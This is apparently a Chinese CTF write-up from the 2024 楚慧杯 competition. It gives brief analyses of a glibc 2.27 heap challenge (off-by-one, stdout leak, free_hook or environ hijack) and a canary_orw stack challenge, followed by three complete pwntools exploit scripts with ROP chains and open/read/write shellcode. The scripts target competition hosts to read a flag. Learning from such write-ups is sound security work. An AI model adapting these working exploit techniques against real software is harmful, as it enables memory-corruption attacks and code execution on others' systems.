2024楚慧杯

EZheap_2

2.27堆题
add,free,edit三个功能

of by one漏洞,有沙盒

函数一个gift给出pie地址

我们可以攻击stdout_attack泄露libc

后续攻击free_hook为setcontect+53,构造出read读入shellcode

或者泄露environ劫持rbp+8

shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
from ae64 import AE64
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('./libc.so.6')   
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6') 
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
#p=remote('139.155.126.78',16215)
p = process('./pwn')

def add(i,size):
	rl("Your choice:")
	sl(str(1))
	rl("index:")
	sl(str(i))
	rl("Size:")
	sl(str(size))
def edit(i,content):
	rl("Your choice:")
	sl(str(2))
	rl("index:")
	sl(str(i))
	rl("context: ")
	s(content)
def free(i):
	rl("Your choice:")
	sl(str(3))
	rl("index:")
	sl(str(i))
def gift():
	rl("Your choice:")
	sl(str(4))
	rl("choose:")
	sl(str(2))

add(0,0x18)  #0
add(1,0x68)  #1
add(2,0x68)  #2
add(3,0x18)  #3
edit(0,b'\x00'*0x18+p8(0xe1))
free(1)
add(4,0xd8)  
gift()
rl(b'0x')
pie_base=int(p.recv(12),16)-0x202160
li(hex(pie_base))
free(2)
edit(4,b'\x00'*0x68+p64(0x71)+p64(pie_base+0x202020)) 
add(5,0x68)
add(6,0x68)
add(7,0x68)
edit(7,p64(0xfbad1800) + p64(0)*3 + b'\x00')
libc_base=get_addr64()-0x3ed8b0
li(hex(libc_base))
system,bin_sh=get_sb()
malloc_hook,free_hook=get_hook()
rdi = libc_base+libc.search(asm("pop rdi\nret")).__next__()
rsi = libc_base+libc.search(asm("pop rsi\nret")).__next__()
rdx = libc_base+libc.search(asm("pop rdx\nret")).__next__()
rax = libc_base+libc.search(asm("pop rax\nret")).__next__()
ret = libc_base+libc.search(asm("ret")).__next__()
syscall=libc_base+libc.search(asm("syscall\nret")).__next__()
jmp_rsp=libc_base+libc.search(asm("jmp rsp")).__next__()
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
open_addr=libc_base+libc.sym['open']
read_addr=libc_base + libc.sym['read']
write_addr=libc_base + libc.sym['write']


add(8,0x18)
add(9,0x58)
add(10,0x58)
add(11,0x18)

edit(8,b'\x00'*0x18+p8(0xc1))

free(9)
add(12,0xb8)
free(10)
edit(12,b'\x00'*0x58+p64(0x61)+p64(free_hook))
payload=(b'\x00'*0x68+p64(0)+p64(free_hook&0xfffffffffffff000)+p64(0)*2+p64(0x2000)).ljust(0xa0,b'\x00')+p64(free_hook&0xfffffffffffff000)+p64(syscall)
add(13,0x58)
add(14,0x58)
edit(14,p64(setcontext+53))
add(15,0x400)
edit(15,payload)
#bug()
free(15)
pause()
sleep(0.1)
payload  = p64(rdi)+p64(free_hook&0xfffffffffffff000)
payload += p64(rsi)+p64(0x1000)
payload += p64(rdx)+p64(7)
payload += p64(rax)+p64(10)
payload += p64(syscall) #mprotect(free_hook&0xfffffffffffff000,0x1000,7)
payload += p64(jmp_rsp)
payload += asm(shellcraft.open('/flag'))
payload += asm(shellcraft.read(3,free_hook+0x300,0x30))
payload += asm(shellcraft.write(1,free_hook+0x300,0x30))

sl(payload)

inter()

environ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
from ae64 import AE64
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('./libc.so.6')   
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6') 
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
p=remote('139.155.126.78',16215)
#p = process('./pwn')

def add(i,size):
	rl("Your choice:")
	sl(str(1))
	rl("index:")
	sl(str(i))
	rl("Size:")
	sl(str(size))
def edit(i,content):
	rl("Your choice:")
	sl(str(2))
	rl("index:")
	sl(str(i))
	rl("context: ")
	s(content)
def free(i):
	rl("Your choice:")
	sl(str(3))
	rl("index:")
	sl(str(i))
def gift():
	rl("Your choice:")
	sl(str(4))
	rl("choose:")
	sl(str(2))

add(0,0x18)  #0
add(1,0x68)  #1
add(2,0x68)  #2
add(3,0x18)  #3
edit(0,b'\x00'*0x18+p8(0xe1))
free(1)
add(4,0xd8)  
gift()
rl(b'0x')
pie_base=int(p.recv(12),16)-0x202160
li(hex(pie_base))
free(2)
edit(4,b'\x00'*0x68+p64(0x71)+p64(pie_base+0x202020)) 
add(5,0x68)
add(6,0x68)
add(7,0x68)
edit(7,p64(0xfbad1800) + p64(0)*3 + b'\x00')
libc_base=get_addr64()-0x3ed8b0
li(hex(libc_base))
system,bin_sh=get_sb()
environ=libc_base+libc.sym['environ']
rdi = libc_base+libc.search(asm("pop rdi\nret")).__next__()
rsi = libc_base+libc.search(asm("pop rsi\nret")).__next__()
rdx = libc_base+libc.search(asm("pop rdx\nret")).__next__()
rax = libc_base+libc.search(asm("pop rax\nret")).__next__()
ret = libc_base+libc.search(asm("ret")).__next__()
syscall=libc_base+libc.search(asm("syscall\nret")).__next__()
jmp_rsp=libc_base+libc.search(asm("jmp rsp")).__next__()
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']+53
open_addr=libc_base+libc.sym['open']
read_addr=libc_base + libc.sym['read']
write_addr=libc_base + libc.sym['write']
shell=p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)
stdout_attack=p64(0xfbad1800)+p64(0)*3+p64(environ)+p64(environ+8)
edit(7,stdout_attack)
stack=get_addr64()-280
li(hex(stack))

add(8,0x18)
add(9,0x58)
add(10,0x58)
add(11,0x18)

edit(8,b'\x00'*0x18+p8(0xc1))

free(9)
add(12,0xb8)
free(10)
edit(12,b'\x00'*0x58+p64(0x61)+p64(stack-0x10))
shell=p64(rdi)+p64(0)+p64(rsi)+p64(stack+64)+p64(rax)+p64(0)+p64(syscall)
add(13,0x58)
add(14,0x58)
flag=stack
reads=b'/flag\x00\x00\x00'*3+shell
#bug()
edit(14,reads)

#pause()
sleep(0.1)
orw = p64(rdi) + p64(flag)  #/flag的字符串位置,要改
orw += p64(rsi) + p64(0)
orw += p64(open_addr)
orw += p64(rdi) + p64(3)
orw += p64(rdx) + p64(0x50)
orw += p64(rsi)+p64(flag+0x500) #读入flag的位置
orw += p64(read_addr)
orw += p64(rdi) + p64(1)
orw += p64(rdx) + p64(0x50)
orw += p64(rsi)+p64(flag+0x500) #读入flag的位置
orw += p64(write_addr)

sl(orw)

inter()

pwn1

源鲁杯原题

[Round 1] canary_orw

jmp rsp,直接给我们0x15字节的溢出,控制函数返回到vuln,并且执行jmp rsp,并写入shellcode,返回栈顶,构造read,读入orw,获取flag,中间有个任意地址写,写的时候忘了利用了,要不然出的更快

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
from pwn import*
from struct import pack
import ctypes
from LibcSearcher import *
from ae64 import AE64
def bug():
    gdb.attach(p)
    pause()
def s(a):
    p.send(a)
def sa(a,b):
    p.sendafter(a,b)
def sl(a):
    p.sendline(a)
def sla(a,b):
    p.sendlineafter(a,b)
def r(a):
    p.recv(a)
#def pr(a):
    #print(p.recv(a))
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def get_addr64():
    return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
    return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
    return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
    return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')   
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6') 
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
p=remote('challenge.yuanloo.com',29329)
#p = process('./pwn')

vuln=0x400820
jmp_rsp=0x40081B
rl("Say some old spells to start the journey\n")

payload =p64(vuln)+p64(jmp_rsp)
payload+=asm('''
xchg rsi,rsp
jmp rsp
''')
pr(hex(len(payload)))
#bug()
s(payload)

rl("Tell me the location of the Eye of the Deep Sea\n")
s(b'a'*8)
rl("I have magic\n")
payload=asm('''
sub rsp,0x30
jmp rsp
''')
s(payload)
rl("Let's go!\n")
payload=asm('''
sub rsi,0x2a
syscall
''')
#bug()
s(payload)


sleep(0.1)
pay=asm('''    
    mov rax, 0x67616c662f2e
    push rax
    xor rdi, rdi
    sub rdi, 100
    mov rsi, rsp
    xor edx, edx
    xor r10, r10
    push SYS_openat
    pop rax
    syscall

    
    
    mov rdi, 1
    mov rsi, 3
    push 0
    mov rdx, rsp
    mov r10, 0x100
    push SYS_sendfile
    pop rax
    syscall
    ''')
s(pay)


inter()